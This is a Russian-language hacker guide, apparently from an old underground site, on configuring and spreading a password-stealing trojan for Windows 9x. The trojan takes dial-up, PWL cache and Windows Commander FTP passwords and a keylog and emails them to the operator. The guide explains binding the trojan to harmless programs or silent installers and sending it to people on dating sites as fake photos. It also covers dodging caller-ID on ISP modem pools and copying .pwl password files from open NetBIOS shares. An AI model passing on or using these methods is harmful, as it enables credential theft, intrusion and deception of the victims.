Халявный И-нет Троянский Конь
Для получения ДиалАп паролей динамически подгружается Rasapi32.dll, и импортируются функции RasGetEntryProperties и RasGetEntryDialParams, которые достают пароли, телефоны и прочие скрипты из маздаевской телефонной книги.
Для получения паролей из PWL файлов в маздайе предусмотренная специальная функция WNetEnumCachedPasswords, которая импортируется из mpr.dll динамически.
FTP пароли от WindowsCommander'а берутся из ини файла wcx_ftp.ini, который лежит в маздай папке. Как пользоваться этими паролями?
Ставите себе WindowsCommander 4.0, делаете ftp соединение с каким нить паролем, лезете в маздай папку и ищите файл wcx_ftp.ini, открываете его и находите то соединение, какое вы только что сделал, ищите там строку с паролем, она должна выглядеть типа :A54F435E3D234A876BA469, и меняете её на ту что пришла вам, естессно ftp сервер должен быть то же что вам пришло.
Щас имеется в наличии две версии это коня, первая: m2_147_jpg.exe, m2_147_dll.exe, m2_147_rundll16.exe - 25К весом, рекомендуется склеивать его с разными прогами(см. ниже), и m2_147_sfx.exe - 16К весом, в этом трояне очень хорошо реализована эмуляция SelfExtractor'а, он сделан таким образом, что на экране появится сообщение об ошибке в архиве, его НЕ рекомедуется склеивать с чем либо по причине того, что кроме проги, с которой вы его склеите, на экране появится окно этого самого SelfExtractor'а. Если вы всётаки решили не исползовать версию SelfExtractor, то юзайте другую версию(m2_147_dll.exe, m2_147_jpg, m2_147_rundll16.exe).
Что надо делать после конфигурации и как впаривать коня.
Если вы используете версию не SelfExtractor, то настроенный конь еще не пригоден для юзания, его надо склеить с какой нить друго прогой. Лезете на http://blade.slak.org и качаете прогу Joiner, или на http://sennaspy.tsx.org и качаете прогу One EXE Maker2000. Эти проги позволяют склеивать два файла между собой(конь и какая нить полезная прога). Вариант №2, Использование программ, создающие Setup файлы. Берёте какую-нить полезную прогу, качаете какой-нить InstallMaker (MindVision Installer VISE, Wise Installation System, GkSetup, Setup Generator). Прогу помещаете в setup, и запихиваете коня, в установках ставите так, что бы конь запускался без разрешения пользователя.
Если вы используете версию SelfExtractor, то в этом случае его можно впаривать под видом архива чего либо, ну фоток или ещо чего. Если вы решили использовать другую версию без SelfExtractor'a, то это может быть какая либо полезная прога, склеенная с конём, или setup, всё это впаривается как всякие проги, проги с инсталяторами, и т.д.
Если вдруг вам понадобилось сменить иконку, в инете есть рульная прога MicroAngelo. Приведу один пример не плохого способа как впаривать коня всяким ламерам. Идёте на сервер знакомств( www.mheart.ru, www.fortuna.ru, www.kiss.ru, и др.), и пишите всем подряд, типа "меня зовут так-то, я бы хотел с тобой познакомиться, и т.д. и т.п.(конешно про себя писать не надо, нужно чо нить придумать :), и прикладываете к письму свои фотки, ну тоесть коня, в данном случае лучше юзать версию SelfExtractor.
Ваша безопасность
В последнее время, злые дядьки-админы разных провайдеров стали ставить на свои момедные пулы АОНы. Это очень сильно обламывает, т.к. это реальная опасность быть пойманым, в лучшем случае вам просто позвонит владелец аккаунта, и предложит вернуть не много денег, за его спизженные часы, ну а в худшем вам могут позвонить в дверь дядьки в форме.
Как всё таки определить наличие АОНа
Очень просто. Звоните на момедный номер телефоном, и слушаете как там снимают трубку, обычно без АОНа это выглядит как один двойной щелчок, а с АОНом слышно два двойных щелчка, сначала трубу снимает АОН(или модем), происходит один двойной щелчок, а потом сам модем(или АОН), и сразу слышен ещо один двойной щелчок. Для тренировки позвоните на 9955555, и вы сразу поймёте, как звучат АОНы.
Небольшой список телефонов с АОНами
9955555, 9955556 - MTU
9951111 - Cityline
Конешно на Citylen'е есть ещо другие телефоны, но к сожелению всех их я не проверял, знаю точно что на ситулине есть телефон 9133949 без АОНа(если ещо его туда не поставили :)
Некоторые диапазоны сетей провайдеров.
Например вам пришли пароли, и в письме указан ипи, ну например 212.188.***.***, По этому ипи адресу можно определить провайдера.
Вот некоторые диапазоны сетей которые я помню:
212.188.***.*** - MTU
195.146.***.*** - Cityline
195.239.***.***, 194.67.***.*** - Russia Online
213.148.***.*** - Comintern
195.2.***.*** - Mr.Postman
195.146.***.*** - Relline
194.186.***.*** - Rline
195.230.***.*** - Tcnet
212.44.***.*** - Sovintel
212.92.***.*** - Cea
194.58.***.*** - Relcom
195.14.***.*** - Corbina
Как настроить
• To:Сюда вы вписываете свое мыло, на которое будут приходить пароли.
• To(second): Сюда можно вписать второе мыло, на которое будут приходить пароли, введено на всякий случай, если не удается отправить по первому мылу. Желательно что б это мыло было в другом домэне чем первое.
• Description:Просто название, или уникальное имя, или ид, вашего коня
• Урл для апдейта:Функция пока временно не работает.
• Через сколько дней повторять посылку:Через сколько дней слать пароли, например есть это 5-ть, то пароли будут приходить каждые 5-ть дней, рекомендуемое значение 4-6. Диапазон допустимых вводимых значений 2-8
Нажимаете кнопку Browz, выбираете коня, и жмёте кнопку Create. Всё! сконфигуренный конь лежит в папке InfeCteD и готов к использованию.
Обозначения:
:os: - Операционная система
:cp: - Имя комьютера
:usr: - Имя юзера
:ip: - Ипи Адресс, например: lamer@dialup184.mtu-net.ru[218.188.45.0]
:uc: - Название соединения(если ДиалАп)
:dv: - Девайс для выхода в инет и название девайса
> Название соединения: # код страны (код города) телефон L: логин P: пароль
:dn: - Домен для этого соединения(если есть)
:dns: - Днс1 и Днс2 для этого соединения(если есть)
:sc: - Скрипт к этому соединению(если есть)
:ed: P: - Пароль из EDialer'а для этого соединения(если есть и если сохранён)
:rna: - Пароли из PLW кэша
:wcp: - Пароли из WindowsCommaner'а(ини файл)
:kl: - Лог кейлоггера
2)Мой ЛЮБИМЫЙ!!!!!!!!!!!!!!!!!!!!!!
Способ два-СКАНЕР ESSNETTOOLS(её можно скачать у нас на сйте в разделе сканеры)
Способ провереный и действует на 100%.Вcё элементарно,врубаешь её тыкаешь NBScan вписываешь от 62.118.140.1 до 62.118.140.255 ,а дальше левой кнопкой открываешь удаленный камп
дальше кликаешь правой кнопкой мыши на диске с: потом на подключить сетевой диск в выплывшем окошке затем смотришь как называется директория смастдаем на удаленной машине (обычно windows но бывает и win.se и win.98 и windows.000 ) затем заходишь в сеанс msdos и пишешь там
c:/windows/ e:/
e:/copy windows/*pwl c:/
или
e:/copy win.98/*pwl c:/
короче в зависимости от названия директории с мастдаем на удаленной тачке.....
Если кто че нового узнает - не поленитесь скиньте в гостевуху .... |